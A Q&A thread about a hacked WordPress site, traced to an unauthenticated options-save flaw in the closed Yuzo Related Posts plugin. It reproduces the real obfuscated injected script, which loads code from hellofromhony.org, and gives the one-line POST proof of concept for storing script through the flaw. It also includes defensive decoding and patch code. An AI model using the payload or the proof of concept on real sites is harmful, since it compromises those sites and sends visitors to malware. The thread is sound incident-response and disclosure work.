Vulnerability in the closed plugin Yuzo Related Posts [closed]

Question   votes: 15   answers: 1

About an hour ago, a WordPress site I manage started redirecting to advertising/malware pages.

I found the source of the redirect and want to share it to help others who are affected, and I need help finding the actual vulnerability and/or a fix.

The redirect happens after the site has finished loading, so I looked for JavaScript snippets in the page and for suspicious redirects in the network analyser. The obvious malicious redirects were: hellofromhony.org, thebiggestfavoritemake.com, nnatrevaleur.tk and a site that tried to grab my current location (though I can't reproduce that one any more).

I was able to trace the redirect to https://hellofromhony.org/counter, which is embedded via a code snippet.

The snippet is embedded in an entry in wp_options with the key 'yuzo_related_post_options' - more specifically, in the JSON option 'yuzo_related_post_css_and_style' inside option_value. That option gets echoed without sanitisation.

This option belongs to the Yuzo Related Posts plugin, which was closed about a week ago: https://wordpress.org/plugins/yuzo-related-post/

Removing the plugin stopped the redirects immediately, and I couldn't find any other traces of tampering with the site.

The snippet from option_value:

    </style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>

Although removing the plugin is a quick fix, I'd like to dig deeper to make sure that the database, the backend and the web space could not be accessed.

wordpress security
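One way to confirm what such an option value actually does without ever running it, as an added PHP example (not code from the question or from the plugin): it pulls the CSS field out of a JSON option_value of the shape the question describes, flags any markup in it, and statically unwraps the nested String.fromCharCode() layers. The function names and the wrapping of the payload into a constructed option_value are this example's assumptions; the payload itself is the one quoted in the question.

```php
<?php
// Added example (not from the question or the plugin). Statically inspects a
// wp_options value of the shape the question describes: JSON carrying a
// 'yuzo_related_post_css_and_style' key that should contain only CSS.

// Extract the CSS field and return it if it carries markup, otherwise null.
// A value that closes </style> or opens <script> inside a CSS-only field is a
// reliable indicator of injection.
function yuzo_example_find_injected_markup(string $option_value): ?string {
    $opts = json_decode($option_value, true);
    $css = is_array($opts)
        ? (string) ($opts['yuzo_related_post_css_and_style'] ?? '')
        : $option_value;            // not JSON: inspect the raw value instead
    return preg_match('~</?\s*(style|script)\b~i', $css) === 1 ? $css : null;
}

// Replace every String.fromCharCode(n, n, ...) call with the decoded text as a
// double-quoted literal, and repeat until none remain, so that calls hidden
// inside an already decoded layer are unwrapped too. No JavaScript is executed;
// the result is a readable view, not necessarily valid JavaScript.
function yuzo_example_decode_fromcharcode(string $js): string {
    $pattern = '~String\.fromCharCode\(\s*([0-9,\s]*)\)~';
    do {
        $js = preg_replace_callback($pattern, function (array $m): string {
            $text = '';
            foreach (preg_split('~\s*,\s*~', trim($m[1])) as $code) {
                if ($code !== '') {
                    $text .= chr((int) $code);   // payload uses ASCII code points only
                }
            }
            return '"' . addcslashes($text, "\"\\") . '"';
        }, $js, -1, $count);
    } while ($count > 0);
    return $js;
}

// Constructed sample: the payload quoted in the question, wrapped in an
// option_value of the JSON shape the question describes.
$payload = '</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>';
$sample_option_value = json_encode(['yuzo_related_post_css_and_style' => $payload]);

$injected = yuzo_example_find_injected_markup($sample_option_value);
if ($injected === null) {
    echo "No markup in the CSS option.\n";
} else {
    echo "Markup found in the CSS option; decoded view:\n";
    echo yuzo_example_decode_fromcharcode($injected), "\n";
}
```

The first decoding pass turns the outer eval() argument into plain source, and the second pass resolves the four inner calls it contains: the decoded view reads as JavaScript that creates a script element of type text/javascript with src https://hellofromhony.org/counter and appends it to the first head element, which is exactly the request the question traced. The same two functions can be run over every row of wp_options (for example from a database dump) rather than just this one key, since any plugin option that is echoed into a page is worth the same check.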
1 Answer

8 votes

I believe I just found it: the Yuzo Related Posts plugin doesn't check authentication when saving options.

So POSTing

    yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>

to /wp-admin/options-general.php?page=yuzo-related-post succeeds even if you are not logged in.

The plugin uses is_admin() to check authentication, but that is a "false friend" and only checks whether the page being accessed is in the admin area, not whether the user is authenticated (authorised). See the WordPress documentation.

The quick fix for continuing to use the plugin is to remove the settings option by adding false to the if statement at line 1155 of /assets/functions/options.php:

    function __construct(){

        global $if_utils;

        $this->utils = $if_utils;

        if(false/* is_admin() */)
            self::configuration_plugin();
        else
            self::parameters();

    }

Update:

Hang Guan pointed to a blog post about this issue from last week; it now looks like it's "in the wild".
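The answer's diagnosis, as an added PHP example that is not the plugin's code: the save path should be gated by a capability check and a nonce rather than by is_admin(), and the CSS field should be stripped of markup both when it is stored and when it is printed. The function names, the hooks named in the comments and the nonce action 'yuzo_save_options' are this example's assumptions; the option name and key are the ones the question found in wp_options.

```php
<?php
// Added example, not the plugin's code. The answer shows that reaching the
// settings save path depended on is_admin() alone. The two functions below
// show what that gate should look like.

// Handles a POSTed settings form. Hook it in the admin only, e.g.
//   add_action('admin_init', 'yuzo_example_save_css_option');
function yuzo_example_save_css_option(): void {
    if (!isset($_POST['yuzo_related_post_css_and_style'])) {
        return; // not our form
    }

    // is_admin() is true for ANY request to a /wp-admin URL, authenticated or
    // not. Authorisation has to be a capability check on the current user.
    if (!current_user_can('manage_options')) {
        wp_die('You are not allowed to change these settings.', '', ['response' => 403]);
    }

    // Reject cross-site forged submissions: the form must carry the nonce
    // emitted by wp_nonce_field('yuzo_save_options'); check_admin_referer()
    // dies if it is missing or invalid.
    check_admin_referer('yuzo_save_options');

    // A CSS field has no legitimate reason to contain markup; strip it on the
    // way in, so "</style><script>..." cannot be stored in the first place.
    $css = wp_strip_all_tags(wp_unslash($_POST['yuzo_related_post_css_and_style']));

    // The question found the options stored as JSON inside option_value.
    $options = json_decode((string) get_option('yuzo_related_post_options', '{}'), true);
    if (!is_array($options)) {
        $options = [];
    }
    $options['yuzo_related_post_css_and_style'] = $css;
    update_option('yuzo_related_post_options', wp_json_encode($options));
}

// Prints the stored CSS into the page head, e.g.
//   add_action('wp_head', 'yuzo_example_print_css_option');
// Stripping again on output is deliberate: it also neutralises a value that
// was written straight into the database, which is what the question observed.
function yuzo_example_print_css_option(): void {
    $options = json_decode((string) get_option('yuzo_related_post_options', '{}'), true);
    $css = is_array($options)
        ? (string) ($options['yuzo_related_post_css_and_style'] ?? '')
        : '';
    if ($css === '') {
        return;
    }
    echo '<style id="yuzo-related-post-css">' . wp_strip_all_tags($css) . '</style>';
}
```

wp_strip_all_tags() removes whole script and style elements before stripping any remaining tags, so the value quoted in the question collapses to an empty string on both paths. It also treats every '<' as the start of a tag, so the field is limited to CSS that does not use that character; for a settings text box that is an acceptable trade. The capability check and the nonce are what is_admin() never provided: the first answers "may this user change options?", the second "did this user actually submit this form?".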
